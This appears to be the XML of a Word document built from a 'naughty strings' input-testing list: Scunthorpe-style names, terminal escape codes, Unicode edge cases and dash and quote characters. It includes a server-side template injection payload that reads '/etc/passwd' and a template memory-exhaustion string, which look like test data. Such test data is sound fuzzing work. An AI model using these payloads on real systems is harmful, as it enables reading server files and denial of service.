        <w:t xml:space="preserve">Penistone Community Church</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Lightwater Country Park</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Jimmy Clitheroe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Horniman Museum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">shitake mushrooms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RomansInSussex.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="DeterministicId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.cum.qc.ca/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Craig Cockburn, Software Specialist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Linda Callahan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dr. Herman I. Libshitz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">magna cum laude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Super Bowl XXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">medieval erection of parapets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">evaluate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">mocha</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">expression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Arsenal canal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">classic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tyson Gay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dick Van Dyke</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">basement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">But now...[20Cfor my greatest trick...[8m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The quick brown fox… [Beeeep]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🏳0🌈️</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">జ్ఞ‌ా</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">گچپژ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{% print ‘x’ * 64 * 1024**3 %}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{{ "".</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[2].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">subclasses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="DeterministicId1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">40</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.read() }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">En dash –</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Em dash —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Horizontal bar ―</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Figure dash ‒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Swung dash ⁓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single opening quote ‘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single closing quote ’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Double opening quote “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Double closing quote ”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Copyright ©</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Registered ®</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Trademark ™</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Section §</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Paragraph ¶</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ellipsis …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Optional hyphen ¬</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Non-breaking hyphen ߛ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Em space ߓ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">En space ߒ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Quarter space ߕ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  <p2:lvl p2:ilvl="3">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="1920" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Symbol" p2:hAnsi="Symbol"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="4">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val="o"/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="2400" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Courier New" p2:hAnsi="Courier New"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="5">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="2880" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Wingdings" p2:hAnsi="Wingdings"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="6">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="3360" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Symbol" p2:hAnsi="Symbol"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="7">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val="o"/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="3840" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Courier New" p2:hAnsi="Courier New"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="8">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="432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  <num xmlns:p2="http://schemas.openxmlformats.org/wordprocessingml/2006/main" p2:numId="2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&quot;/etc/passwd&quot;" TargetMode="External" Id="DeterministicId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cum.qc.ca/" TargetMode="External" Id="DeterministicId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="DeterministicId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="DeterministicId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="DeterministicId5" /></Relationships>
</file>